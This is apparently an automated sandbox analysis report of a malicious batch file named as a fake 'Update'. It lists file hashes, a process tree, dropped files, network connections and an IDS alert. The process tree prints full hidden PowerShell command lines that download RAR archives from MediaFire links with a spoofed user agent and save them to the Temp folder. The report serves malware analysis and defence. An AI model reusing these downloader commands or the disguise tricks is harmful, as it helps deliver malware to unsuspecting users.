File name: | ▶️Update_№16808_Open____________________________________.bat |
Full analysis: | https://app.any.run/tasks/23973f5d-b2ec-4381-bea2-0c35be6c4371 |
Verdict: | Malicious activity |
Analysis date: | April 01, 2023, 09:04:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 554142645426B4E3B0D8594BFF09B0F9 |
SHA1: | B695EA8044EB3C605455B74FDBB179813E44EA2B |
SHA256: | EAD93A91B05CFC325F236397F6357B24DB86A374BADEC74F07374A3E9CF0C454 |
SSDEEP: | 96:CSG+39DwW5z5+39DwW5P+gD9DwW5/+gz9DwW5a+U9hX6IJADeHTKPfOY5Pk5:jn9M0zc9M0DD9M0Tz9M0wv6IJADeHmPM |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
624 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\▶️Update_№16808_Open____________________________________.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
596 | powershell -windowstyle hidden -Command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294770688 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
956 | powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/1ush0ujca5221mj/axorojeyi1.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\admin\AppData\Local\Temp\weba.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
1748 | powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/l25w81fnaj63swq/bipicajuva2.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\admin\AppData\Local\Temp\webb.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
244 | C:\Windows\system32\cmd.exe /c find "https://download" C:\Users\admin\AppData\Local\Temp\weba.html | find /i ".rar" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1976 | find "https://download" C:\Users\admin\AppData\Local\Temp\weba.html | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1636 | find /i ".rar" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (956) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (1748) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Filename | Type | |
---|---|---|---|---|
956 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:80F76A9B07C930826A7D1F2068C8E56E | SHA256:13C190ED655762B9F2FD4BFF252CB972846C5B8BE3F361B8106702D273330902 | |||
1748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xg5kej02.1vz.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
956 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
1748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\gunedklq.t0s.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\1c22xvr1.jpa.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\epwmie4o.vdv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
956 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3 | SHA256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72 | |||
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\CabB0E7.tmp | compressed | |
MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3 | SHA256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72 | |||
956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TarB0E8.tmp | cat | |
MD5:BE2BEC6E8C5653136D3E72FE53C98AA3 | SHA256:1919AAB2A820642490169BDC4E88BD1189E22F83E7498BF8EBDFB62EC7D843FD | |||
596 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
956 | powershell.exe | GET | 200 | 8.248.139.254:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b4b01606f6b4990d | US | compressed | 61.1 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
956 | powershell.exe | 104.16.54.48:443 | www.mediafire.com | CLOUDFLARENET | — | suspicious |
1748 | powershell.exe | 104.16.54.48:443 | www.mediafire.com | CLOUDFLARENET | — | suspicious |
956 | powershell.exe | 8.248.139.254:80 | ctldl.windowsupdate.com | LEVEL3 | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.mediafire.com |
| shared |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup |